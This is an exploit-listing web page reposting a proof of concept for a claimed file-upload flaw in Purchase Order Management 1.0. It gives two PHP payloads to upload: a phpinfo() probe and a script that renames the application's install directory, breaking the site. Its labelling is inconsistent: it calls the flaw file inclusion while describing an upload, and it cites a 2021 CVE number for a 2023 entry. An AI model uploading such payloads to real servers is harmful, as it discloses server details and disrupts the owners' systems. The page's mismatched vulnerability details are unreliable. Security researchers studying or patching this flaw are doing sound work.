Advertisement






Purchase Order Management 1.0 Shell Upload

CVE Category Price Severity
CVE-2021-39343 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-03-08
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030016

Below is a copy:

Purchase Order Management 1.0 Shell Upload
## Title: Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivileged user interaction - file upload in the server
## Author: nu11secur1ty
## Date: 03.06.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities.
The users of this system are allowed to submit input into files or
upload files to the server.
The malicious attacker can get absolute control of this system!

STATUS: CRITICAL Vulnerability


[+]Get Info:

```PHP
<?php
// by nu11secur1ty - 2023
phpinfo();
?>

```
[+]Exploit:

```PHP
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/purchase_order/" ;

// New Name For The File
$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ;

// using rename() function to rename the file
rename( $old_name, $new_name) ;

?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0)

## Proof and Exploit:
[href](https://streamable.com/vkq31h)

## Time spend:
00:35:00

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum